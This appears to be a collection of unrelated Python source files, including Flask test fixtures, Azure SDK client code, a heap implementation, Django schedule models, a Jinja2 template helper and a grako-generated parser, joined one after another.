db.session.delete(regular_user_instance)
db.session.commit()
@pytest.yield_fixture(scope='session')
def readonly_user(flask_app):
# pylint: disable=invalid-name,unused-argument
from app.extensions import db
readonly_user_instance = utils.generate_user_instance(
username='readonly_user',
is_regular_user=False
)
db.session.add(readonly_user_instance)
db.session.commit()
yield readonly_user_instance
db.session.delete(readonly_user_instance)
db.session.commit()
@pytest.yield_fixture(scope='session')
def admin_user(flask_app):
# pylint: disable=invalid-name,unused-argument
from app.extensions import db
admin_user_instance = utils.generate_user_instance(
username='admin_user',
is_admin=True
)
db.session.add(admin_user_instance)
db.session.commit()
yield admin_user_instance
db.session.delete(admin_user_instance)
db.session.commit()
@pytest.yield_fixture(scope='session')
def internal_user(flask_app):
# pylint: disable=invalid-name,unused-argument
from app.extensions import db
internal_user_instance = utils.generate_user_instance(
username='internal_user',
is_regular_user=False,
is_admin=False,
is_active=True,
is_internal=True
)
db.session.add(internal_user_instance)
db.session.commit()
yield internal_user_instance
db.session.delete(internal_user_instance)
db.session.commit()
|
import functools
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
resource_group_name: str,
subscription_id: str,
resource_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2018-05-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_request(
resource_group_name: str,
subscription_id: str,
resource_name: str,
configuration_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2018-05-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
"ConfigurationId": _SERIALIZER.url("configuration_id", configuration_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_update_request(
resource_group_name: str,
subscription_id: str,
resource_name: str,
configuration_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2018-05-01-preview"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
"ConfigurationId": _SERIALIZER.url("configuration_id", configuration_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
class ProactiveDetectionConfigurationsOperations(object):
"""ProactiveDetectionConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.applicationinsights.v2018_05_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> List["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]:
"""Gets a list of ProactiveDetection configurations of an Application Insights component.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param resource_name: The name of the Application Insights component resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
cls(response)
:rtype:
list[~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
resource_name=resource_name,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('[ApplicationInsightsComponentProactiveDetectionConfiguration]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs'} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
resource_name: str,
configuration_id: str,
**kwargs: Any
) -> "_models.ApplicationInsightsComponentProactiveDetectionConfiguration":
"""Get the ProactiveDetection configuration for this configuration id.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param resource_name: The name of the Application Insights component resource.
:type resource_name: str
:param configuration_id: The ProactiveDetection configuration ID. This is unique within a
Application Insights component.
:type configuration_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
cls(response)
:rtype:
~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
resource_name=resource_name,
configuration_id=configuration_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationInsightsComponentProactiveDetectionConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}'} # type: ignore
@distributed_trace
def update(
self,
resource_group_name: str,
resource_name: str,
configuration_id: str,
proactive_detection_properties: "_models.ApplicationInsightsComponentProactiveDetectionConfiguration",
**kwargs: Any
) -> "_models.ApplicationInsightsComponentProactiveDetectionConfiguration":
"""Update the ProactiveDetection configuration for this configuration id.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param resource_name: The name of the Application Insights component resource.
:type resource_name: str
:param configuration_id: The ProactiveDetection configuration ID. This is unique within a
Application Insights component.
:type configuration_id: str
:param proactive_detection_properties: Properties that need to be specified to update the
ProactiveDetection configuration.
:type proactive_detection_properties:
~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
cls(response)
:rtype:
~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(proactive_detection_properties, 'ApplicationInsightsComponentProactiveDetectionConfiguration')
request = build_update_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
resource_name=resource_name,
configuration_id=configuration_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationInsightsComponentProactiveDetectionConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}'} # type: ignore
|
class Heap(object):
def __init__(self, data=[]):
if len(data) == 0:
self.data = [None] * 100
else:
self.data = data
self.__size = sum([1 if item is not None else 0 for item in self.data])
self.__heapify()
def size(self):
return self.__size
def empty(self):
return self.__size == 0
def get_max(self):
return self.data[0]
def delete_max(self):
max_data = self.data[0]
self.__swap(0, self.__size - 1)
self.data[self.__size - 1] = None
self.__size -= 1
self.__percolate_down(0)
return max_data
def insert(self, number):
if self.__size == len(self.data):
self.__expand()
self.__size += 1
self.data[self.__size - 1] = number
return self.__percolate_up(self.__size - 1)
@staticmethod
def heap_sort(data):
heap = Heap(data)
index = heap.size() - 1
while not heap.empty():
heap.data[index] = heap.delete_max()
index -= 1
return heap.data
def __percolate_down(self, i):
initial_value = self.data[i]
current_index = i
potential_parent = self.__proper_parent(current_index)
while self.data[potential_parent] > self.data[current_index]:
self.data[current_index] = self.data[potential_parent]
current_index = potential_parent
potential_parent = self.__proper_parent(current_index)
self.data[current_index] = initial_value
return current_index
def __percolate_up(self, i):
if not self.__has_parent(i):
return 0
initial_value = self.data[i]
parent_indexes = []
h = 1
current_index = i
while self.__has_parent(current_index):
current_index = ((i + 1) >> h) - 1
parent_indexes.append(current_index)
h += 1
lo = 0
hi = len(parent_indexes) - 1
while lo + 1 < hi:
mi = (lo + hi) / 2
if self.data[parent_indexes[mi]] <= self.data[i]:
lo = mi
else:
hi = mi
parent_indexes.insert(0, i)
lo = lo + 1
index = 0
while index < lo:
self.data[parent_indexes[index]] = self.data[parent_indexes[index + 1]]
index += 1
self.data[parent_indexes[lo]] = initial_value
return parent_indexes[lo]
def __expand(self):
new_data = [None] * (self.__size * 2)
for i in range(self.__size):
new_data[i] = self.data[i]
self.data = new_data
def __heapify(self):
i = self.__last_internal()
while self.__in_heap(i):
self.__percolate_down(i)
i -= 1
def __swap(self, i , j):
temp = self.data[i]
self.data[i] = self.data[j]
self.data[j] = temp
def __in_heap(self, i):
return 0 <= i < self.size()
def __parent(self, i):
return (i - 1) >> 1
def __last_internal(self):
return self.__parent(self.size() - 1)
def __left_child(self, i):
return (i << 1) + 1
def __right_child(self, i):
return (i + 1) << 1
def __has_parent(self, i):
return 0 < i
def __has_left_child(self, i):
return self.__in_heap(self.__left_child(i))
def __has_right_child(self, i):
return self.__in_heap(self.__right_child(i))
def __bigger(self, i, j):
return i if self.data[i] > self.data[j] else j
def __proper_parent(self, i):
return self.__bigger(self.__bigger(self.__left_child(i), self.__right_child(i)), i) if self.__has_right_child(i) else \
self.__bigger(self.__left_child(i), i) if self.__has_left_child(i) else \
i
|
from gi.repository import Gtk, Gdk
class MapEntity:
# self.x = None
# self.y = None
# self.name = None
# self.texture = None
def getCoords(self):
return self.x,self.y
def getx(self):
return self.x
def gety(self):
return self.y
def setCoords(self,xcoord,ycoord):
self.x = xcoord
self.y = ycoord
def getName(self):
return self.name
def setName(self, strname):
self.name = strname
def __init__(self, xarg, yarg, namearg):
self.x = xarg
self.y = yarg
self.name = namearg
return
|
"""
.. module:: test
test
*************
:Description: test
:Authors: bejar
:Version:
:Created on: 10/02/2015 9:50
"""
__author__ = 'bejar'
from MeanPartition import MeanPartitionClustering
from kemlglearn.datasets import cluster_generator
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs, load_iris, make_circles
nc = 15
X, y = cluster_generator(n_clusters=nc, sepval=0.2, numNonNoisy=100, numNoisy=10, rangeN=[150, 200])
gkm = MeanPartitionClustering(n_clusters=nc, n_components=40, n_neighbors=3, trans='spectral', cdistance='ANMI')
res, l = gkm.fit(X, y)
fig = plt.figure()
ax = fig.add_subplot(111)
plt.scatter(res[:, 0], res[:, 1], c=l)
plt.show()
|
import eventmaster
import time
import random
import sys
import unittest
import sys
class InputsTestCase(unittest.TestCase):
def setUp(self):
self.s3 = E2S3.E2S3Switcher()
self.s3.set_verbose(0)
self.s3.set_CommsXML_IP("127.0.0.1")
self.s3.set_CommsXML_Port(9876)
if not self.s3.connect(): return -1
while self.s3.is_ready() != 1: time.sleep(1)
def test_set_valid_name_on_invalid_input(self):
test_str = "PYTEST-{0!s}".format(random.randint(1,10))
self.assertRaises(ValueError, lambda: self.s3.get_input(99).set_Name(test_str))
def test_set_valid_name_on_valid_input(self):
test_str = "PYTEST-{0!s}".format(random.randint(1,10))
while(self.s3.has_been_processed(self.s3.get_input(0).set_Name(test_str))==0): time.sleep(1)
time.sleep(1)
self.assertEqual(test_str, self.s3.get_input(0).get_Name())
def test_set_invalid_name_on_valid_input(self):
MyObject = type('MyObject', (object,), {})
self.assertEqual(self.s3.get_input(0).set_Name(MyObject), None)
print unittest.main()
sys.exit()
|
""" synrcat
gaussian mixture model
"""
import sys
import os
import numpy as np
import logging
from collections import OrderedDict
from astropy.table import Table
from pypeline import pype, add_param, depends_on
from syn import Syn
from syncat.errors import NoPoints
import syncat.misc as misc
import syncat.fileio as fileio
import time
@add_param('cat_model', metavar='filename', default='out/syn.pickle', type=str,
help='file with catalogue model to load')
@add_param('hints_file', metavar='filename', default='in/syn_hints.txt', type=str,
help='give hints about parameter distributions')
@depends_on(Syn)
class GaussianMixtureModel(pype):
""" SynCat mode to generate random catalogue by sampling from a gaussian mixture model.
Parameters
----------
mask : minimask.Mask instance
mask describing survey geometry to sample from. If None, sample from full-sky.
cat_model : str
path to file with catalogue model to load
hints_file : str
path to file with hints about parameter distributions
"""
def __init__(self, config={}, mask=None, **kwargs):
""" """
self._parse_config(config, **kwargs)
self._setup_logging()
self.load_hints()
self.mask = mask
self.syn = None
def sample_sky(self, zone=None, nside=None, order=None):
""" Sample sky coordinates.
Parameters
----------
zone : int, list
optional healpix zone index or list of indices from which to sample. Otherwise sample from all zones.
nside : int
healpix nside for zone pixelization
order : str
healpix ordering for zone pixelization
"""
return np.transpose(self.mask.draw_random_position(density=self.config['density'], n=self.config['count'],
cell=zone, nside=nside))
def load_hints(self):
""" Load the hints file.
The hints file contains information about the parameter distributions.
"""
self.hints = {}
if os.path.exists(self.config['hints_file']):
for line in file(self.config['hints_file']):
line = line.strip()
if line == "":
continue
if line.startswith("#"):
continue
words = line.split()
instruction = None
low = None
high = None
name = words.pop(0)
if len(words) > 0:
instruction = words.pop(0)
if len(words) > 0:
low = float(words.pop(0))
if len(words) > 0:
high = float(words.pop(0))
if instruction not in self.hints:
self.hints[instruction] = []
self.hints[instruction].append((name, low, high))
self.logger.info("got hint for '%s': instruction is %s with range: %s, %s", name, instruction, low, high)
return self.hints
def fit(self, filename=None, add_columns=True):
""" Fit a Gaussian mixture model to the input catalogue.
Parameters
----------
filename : str
path to input catalogue.
"""
if filename is None:
filename = self.config['in_cat']
if os.path.exists(self.config['cat_model']) and not self.config['overwrite']:
self.logger.info("reading %s", self.config['cat_model'])
self.syn = Syn(self.config['cat_model'])
self.labels = self.syn.labels
return
hints = self.load_hints()
self.logger.info("loading %s", filename)
table = fileio.read_catalogue(filename, format=self.config['input_format'], columns=self.config['input_columns'], quick=self.config['quick'])
table_dtype = table.dtype
table = misc.remove_columns(table, self.config['skip'])
properties = list(table.dtype.names)
if self.logger.isEnabledFor(logging.INFO):
mesg = ""
for i, p in enumerate(properties):
mesg += "\n{:>3} {}".format(1 + i, p)
self.logger.info("got these %i columns:%s", len(properties), mesg)
self.syn = Syn(labels=properties, hints=hints, config=self.config)
dtype = table.dtype
if add_columns:
dtype = misc.append_dtypes(dtype, self.config['add_columns'], table_dtype)
if self.config['sample_sky'] and self.config['skycoord_name'] not in dtype.names:
skycoord_name = self.config['skycoord_name']
alpha, delta = skycoord_name
skycoord_dtype = np.dtype([(alpha, np.float64), (delta, np.float64)])
dtype = misc.concatenate_dtypes([dtype, skycoord_dtype])
self.syn.fit(table, dtype=dtype)
# store column names
self.labels = properties
# save catalogue model
self.syn.save(self.config['cat_model'])
def sample(self):
""" Sample from the Gaussian mixture model.
Returns
-------
numpy strucarray : random catalogue
"""
if self.syn is None:
if not os.path.exists(self.config['cat_model']):
raise Exception("Cannot load catalogue model. Files does not exist: %s"%self.config['cat_model'])
self.syn = Syn(self.config['cat_model'])
if self.config['sample_sky']:
skycoord = self.sample_sky()
count = len(skycoord)
else:
count = self.config['count']
if count == 0:
raise NoPoints
randoms = self.syn.sample(n=count)
if self.config['sample_sky']:
skycoord_name = self.config['skycoord_name']
for i in range(len(skycoord_name)):
randoms[skycoord_name[i]] = skycoord[:,i]
return randoms
|
import re
from jinja2 import Environment
from .observable import Observable
def get_attribute(render_data, variable):
levels = variable.split('.')
r = render_data
for level in levels:
if hasattr(r, level):
r = getattr(r, level)
else:
r = r.get(level) or {}
if not r:
return ''
return r
variable_re = re.compile(r'({\s*.*\s*})')
def is_function(text, node):
fnname = render_template(text, node)
return hasattr(fnname, node)
env = Environment(variable_start_string='{', variable_end_string='}')
def render_template(text, render_data):
if not (text.startswith('{') and text.endswith('}')):
return env.from_string(text).render(**vars(render_data))
expr = text[1:-1]
return env.compile_expression(expr)(**vars(render_data))
variables = variable_re.findall(text)
variables = {var[1:-1].strip(): var for var in variables}
for variable in variables:
rendered = get_attribute(render_data, variable)
if callable(rendered):
return rendered
text = text.replace(variables[variable], rendered)
return text
|
import os
import os.path
import stat
import hashlib
import sys
SHA1_MAX_BYTES_READ_DEFAULT = float("inf") # defaults to read entire file
def sha1_hex_file(filepath, max_bytes=None):
"""
Returns the SHA1 of a given filepath in hexadecimal.
Opt-args:
* max_bytes. If given, reads at most max_bytes bytes from the file.
"""
sha1 = hashlib.sha1()
f = open(filepath, 'rb')
try:
if max_bytes:
data = f.read(max_bytes)
else:
data = f.read()
sha1.update(data)
finally:
f.close()
return sha1.hexdigest()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description="""Finds files and creates a lists of their paths, inodes and sha1 checksums.' +
Useful to make a backup of filepaths before renaming them, for example before a large number of renames by a script.
SAMPLE CALLS
find_path_sha1.py
find_path_sha1.py -n 100000
""",
epilog="Report any bugs to ciro.santilli@gmail.com",
prog='Program')
parser.add_argument('-m', '--max-sha1-bytes',
action="store",
dest="sha1_max_bytes_read",
type=int,
default=SHA1_MAX_BYTES_READ_DEFAULT,
help='Maximum number of bytes to read to calculate SHA1 checksum.'+
'Reading the whole file might be too slow, and unnecessary for some applications.')
args = parser.parse_args(sys.argv[1:])
sha1_max_bytes_read = args.sha1_max_bytes_read
file_output = ""
print "sha1_max_bytes_read"
print sha1_max_bytes_read
print
paths = []
for root, dirs, files in os.walk('.'):
for bname in files:
paths.append(os.path.join(root,bname))
paths.sort()
for path in paths:
print path
print str(sha1_hex_file(path,sha1_max_bytes_read))
print
|
'''
Test
'''
import sys
sys.path.append('.')
from tornado.testing import AsyncHTTPSTestCase
from application import APP
class TestSomeHandler(AsyncHTTPSTestCase):
'''
Test
'''
def get_app(self):
'''
Test
'''
return APP
def test_index(self):
'''
Test index.
'''
response = self.fetch('/')
self.assertEqual(response.code, 200)
|
from typing import Any
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from ._version import VERSION
class SynapseClientConfiguration(Configuration):
"""Configuration for SynapseClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: azure.core.credentials.TokenCredential
:param synapse_dns_suffix: Gets the DNS suffix used as the base for all Synapse service requests.
:type synapse_dns_suffix: str
:param livy_api_version: Valid api-version for the request.
:type livy_api_version: str
"""
def __init__(
self,
credential, # type: "TokenCredential"
synapse_dns_suffix="dev.azuresynapse.net", # type: str
livy_api_version="2019-11-01-preview", # type: str
**kwargs # type: Any
):
# type: (...) -> None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if synapse_dns_suffix is None:
raise ValueError("Parameter 'synapse_dns_suffix' must not be None.")
if livy_api_version is None:
raise ValueError("Parameter 'livy_api_version' must not be None.")
super(SynapseClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.synapse_dns_suffix = synapse_dns_suffix
self.livy_api_version = livy_api_version
self.api_version = "2019-11-01-preview"
self.credential_scopes = ['https://dev.azuresynapse.net/.default']
self._configure(**kwargs)
self.user_agent_policy.add_user_agent('azsdk-python-synapseclient/{}'.format(VERSION))
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
|
from django.db import models
from datetime import datetime
class Place(models.Model):
"""
Holder object for basic info about the rooms
in the university.
"""
room_place = models.CharField(max_length=255)
floor = models.IntegerField()
def __unicode__(self):
return self.room_place
class HierarchyUnit(models.Model):
PROGRAM = 'PR'
YEAR = 'YR'
GROUP = 'GR'
TYPES = (
(PROGRAM, u"Специалност"),
(YEAR, u"Курс"),
(GROUP, u"Група"),
)
type_value = models.CharField(max_length=255, choices=TYPES)
value = models.CharField(max_length=255)
parent = models.ForeignKey("schedule.HierarchyUnit", null=True, blank=True, default=None)
def get_all_info_for_parents(self):
if self.type_value == 'PR':
return self.value
if self.type_value == 'YR':
return ', '.join([self.parent.value, self.value+u' курс'])
else:
return ', '.join([self.parent.parent.value, self.parent.value+u' курс', self.value+u' група'])
def get_all_childs(self):
return HierarchyUnit.objects.filter(parent=self)
def __unicode__(self):
return self.get_all_info_for_parents()
class Block(models.Model):
"""
Group representing a set of optional subjects.
Example: Core of Computer Science.
"""
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Subject(models.Model):
"""
Representation of all subjects.
Example: Calculus 1.
"""
MANDATORY = 'MN'
OPTIONAL = 'OP'
TYPES = (
(MANDATORY, u"Задължителен"),
(OPTIONAL, u"Избираем"),
)
type_value = models.CharField(max_length=255, choices=TYPES)
name = models.CharField(max_length=255)
block = models.ForeignKey(Block, null=True, blank=True, default=None)
year = models.ForeignKey(HierarchyUnit, null=True, blank=True, default=None, limit_choices_to={'type_value': HierarchyUnit.YEAR})
def get_year_value(self):
return ', '.join([self.year.parent.value, self.year.value+u' курс'])
def __unicode__(self):
return self.name
class Department(models.Model):
"""
Group representing a set of lecturers
grouped by field of teaching.
"""
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Teacher(models.Model):
name = models.CharField(max_length=255)
title = models.CharField(max_length=255)
email = models.CharField(max_length=255)
full_name = models.CharField(max_length=255)
position = models.CharField(max_length=255)
subjects = models.ManyToManyField(Subject, null=True, blank=True, default=None)
department = models.ForeignKey(Department, null=True, blank=True, default=None)
def __unicode__(self):
return self.name
class Event(models.Model):
WEEKLY = 'WKL'
TYPES = (
(WEEKLY, u'Седмично'),
)
type_value = models.CharField(max_length=255, null=True, blank=True, default=None)
inserted = models.DateField(default=datetime.now())
name = models.CharField(max_length=255)
place = models.ForeignKey(Place, blank=True, default=None, null=True)
date_start = models.DateTimeField()
date_end = models.DateTimeField(default=datetime.now())
repeatable = models.BooleanField()
duratation = models.IntegerField()
subject = models.ForeignKey(Subject, blank=True, default=None, null=True)
teacher = models.ForeignKey(Teacher, blank=True, default=None, null=True)
def __unicode__(self):
return self.name
class Student(models.Model):
PROGRAM = (('BK', 'Бакалавър'),('MG', 'Магистър'))
name = models.CharField(max_length=255)
program = models.CharField(max_length=255,choices=PROGRAM, blank=True, default=PROGRAM[0][0])
fac_number = models.CharField(max_length=255)
email = models.CharField(max_length=255)
group = models.ForeignKey(HierarchyUnit, limit_choices_to={'type_value': HierarchyUnit.GROUP}, blank=True, default=None, null=True)
events = models.ManyToManyField(Event, blank=True, default=None, null=True)
def __unicode__(self):
return self.name
class Comment(models.Model):
from_user = models.ForeignKey(Student, blank=True, default=None, null=True)
event = models.ForeignKey(Event, blank=True, default=None, null=True)
start_date = models.DateField()
end_date = models.DateField()
dtstamp = models.DateField(default=datetime.now())
desc = models.TextField()
|
from cherrydo.utils import is_cherrydo_project
class CherryDoException(Exception):
pass
class BaseGenerator(object):
def __init__(self, name, params):
self.name = name
self.params = params
def formatted_name(self):
return self.name.replace('_', ' ').title().replace(' ', '')
def validate(self):
pass
def default_context(self):
return {}
def create(self):
return True
class CherryDoGenerator(BaseGenerator):
def validate(self):
if not is_cherrydo_project():
raise CherryDoException('CherryDo project not found!')
|
from libdotfiles.packages import try_install
from libdotfiles.util import HOME_DIR, PKG_DIR, copy_file
try_install("alacritty")
copy_file(
PKG_DIR / "alacritty.yml",
HOME_DIR / ".config" / "alacritty" / "alacritty.yml",
)
|
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS
__version__ = (2015, 12, 26, 22, 15, 59, 5)
__all__ = [
'BParser',
'BSemantics',
'main'
]
class BParser(Parser):
def __init__(self,
whitespace=None,
nameguard=None,
comments_re='/\\*((?:[^\\*]|\\*[^/]|\\n)*?)\\*+/',
eol_comments_re=None,
ignorecase=None,
left_recursion=False,
**kwargs):
super(BParser, self).__init__(
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
left_recursion=left_recursion,
**kwargs
)
@graken()
def _program_(self):
def block1():
self._definition_()
self._cut()
self._closure(block1)
self.ast['@'] = self.last_node
self._check_eof()
@graken()
def _definition_(self):
with self._choice():
with self._option():
self._simpledef_()
with self._option():
self._vectordef_()
with self._option():
self._functiondef_()
self._error('no available options')
@graken()
def _simpledef_(self):
self._name_()
self.ast['name'] = self.last_node
with self._optional():
self._ival_()
self.ast['init'] = self.last_node
self._token(';')
self.ast._define(
['name', 'init'],
[]
)
@graken()
def _vectordef_(self):
self._name_()
self.ast['name'] = self.last_node
self._token('[')
with self._optional():
self._constantexpr_()
self.ast['maxidx'] = self.last_node
self._token(']')
